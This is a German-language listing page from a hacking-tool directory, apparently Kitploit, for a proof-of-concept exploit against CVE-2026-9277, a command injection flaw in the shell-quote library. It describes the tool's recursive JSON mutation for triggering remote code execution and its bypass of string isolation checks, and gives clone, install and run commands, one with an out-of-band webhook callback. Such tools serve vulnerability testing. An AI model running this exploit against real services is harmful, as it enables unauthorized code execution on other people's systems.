Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-9277 — Proof-of-Concept-Exploit für CVE-2026-9277, eine Befehlsinjektions-Schwachstelle in der shell-quote-Bibliothek. Führt rekursive JSON-Traversierung mit kombinatorischer Mutation durch, um RCE auszulösen, unterstützt OOB-Verifizierung und Zero-Noise-Protokollierung. | Kitploit
Tools/GitHubGitHub/dylanzahedi/cve-2026-9277
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubdylanzahedi/cve-2026-9277

CVE-2026-9277

Proof-of-Concept-Exploit für CVE-2026-9277, eine Befehlsinjektions-Schwachstelle in der shell-quote-Bibliothek. Führt rekursive JSON-Traversierung mit kombinatorischer Mutation durch, um RCE auszulösen, unterstützt OOB-Verifizierung und Zero-Noise-Protokollierung.

Repository anzeigen
21vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-9277 - Shell-Quote-Befehlsinjektions-Exploit

Ein spezialisiertes Proof-of-Concept-Exploit-Skript (PoC) zur Verifizierung und Demonstration von CVE-2026-9277 – einer strukturellen Befehlsinjektions-Schwachstelle (Command Injection) in älteren Versionen der Bibliothek shell-quote (<= 1.8.3).

Der Scanner führt eine tiefgreifende strukturelle Manipulation eingegebener JSON-Payloads durch, um über rekursive Traversierung Remote-Code-Ausführungsvektoren (RCE) aufzudecken, und verhindert Fehlalarme mithilfe einer dynamischen Netzwerk-Baseline-Timing-Engine.


Hauptfunktionen

  • Rekursive JSON-Traversierung: Erkennt und mutiert automatisch Ziel-Arrays, die in mehrschichtigen verschachtelten JSON-Strukturen oder GraphQL-ähnlichen Konfigurationen verborgen sind.
  • Kombinatorische Mutations-Matrix: Testet erweiterte Array-Manipulationsszenarien, einschließlich spezifischer Indexeinfügungen, absoluter Listenüberschreibungen und verteilter Array-Paare.
  • Automatisierte OOB-Architektur: Verarbeitet erweiterte Out-of-Band-Ausführungslayouts, indem {"op": "..."}-Komponenten von Argumenten getrennt werden, um String-Isolationskontrollen erfolgreich zu umgehen.
  • Rauschfreie Protokollierung: Leise Ausführungs-Engine, die fehlerhafte/nicht ausnutzbare 500-Internal-Server-Antworten herausfiltert und ausschließlich verifizierte Beweise liefert.

Installation & Einrichtung

Stellen Sie sicher, dass Python 3.10+ und die erforderlichen Pakete installiert sind:

root@kitploit:~
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3

Ausführungsbeispiele

Beispiel 1: Lokaler Scan mit Output-Leaking

root@kitploit:~
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'

Beispiel 2: Out-of-Band-Tests (OOB) mit verschachtelter Dictionary-Struktur

root@kitploit:~
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"


CVE-2026-9277
Tool herunterladen